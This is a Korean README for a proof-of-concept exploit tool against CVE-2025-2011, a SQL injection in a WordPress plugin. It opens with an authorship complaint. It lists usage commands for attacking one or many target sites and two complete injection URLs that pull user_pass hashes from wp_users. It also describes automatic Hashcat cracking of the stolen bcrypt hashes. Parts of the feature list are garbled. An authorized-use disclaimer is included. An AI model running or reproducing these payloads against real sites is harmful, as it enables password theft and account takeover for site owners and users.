
CVE-2025-2011에 대한 익스플로잇
By: X3RX3S 하지만 Ash Wesker가 내 코드를 가져다가 자기 배너로 GPT 돌려서 대담하게 가로챘음 ;) 여기 참조 ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 '그의' 코드에서 내 닉네임도 볼 수 있음 -_-'
목적: WordPress 사이트를 대상으로 SQL 인젝션 취약점(CVE-2025-2011)을 테스트하기 위한 개념 증명(PoC) 도구.
면책 조항: 소유했거나 테스트에 대한 명시적 서면 허가를 받은 시스템에서 만 사용하세요. 무단 테스트는 불법이며 비윤리적입니다.

-p 1 또는 -p 2로 선택 가능)$2a$, $2b$, $2y$) 해시 탐지, $wp$ 접두사 변형 포함results_<hostname>.txt-m 3200) Hashcat 통합-u) 또는 파일(-f)을 통한 다중 대상 지원requestscolorama의존성 설치:
pip install requests colorama
선택 사항(크래킹용):
hashcat이 설치되어 PATH에 있어야 함(기본값은 /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txt 같은 워드리스트스크립트를 실행 가능하게 만들기(선택 사항):
chmod +x CVE-2025-2011.py
단일 대상(기본 페이로드 1):
python3 CVE-2025-2011.py -u https://example.com
단일 대상(페이로드 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
파일에서 여러 대상 지정(줄마다 URL 하나):
python3 CVE-2025-2011.py -f targets.txt
테스트된 각 호스트에 대해 스크립트는 결과 파일을 저장합니다:
results_<hostname>.txt
bcrypt 해시가 발견되면 hashes.txt에 저장되고 Hashcat으로 크래킹할지 묻는 메시지가 표시됩니다. 스크립트가 사용하는 Hashcat 명령 예시:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
참고: bcrypt는 설계상 느립니다. 크래킹에 매우 오랜 시간이 걸릴 수 있으며 GPU가 필요할 수 있습니다.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
이 도구는 교육 및 방어 목적으로만 제공됩니다. 명시적 허가가 없는 시스템에는 사용하지 마십시오. 작성자와 배포자는 오용에 대해 어떠한 책임도 지지 않습니다. 소유하지 않은 대상을 테스트하기 전에 항상 서면 승인을 받으십시오.
run_hashcat 함수를 원하는 목록을 가리키도록 업데이트하세요.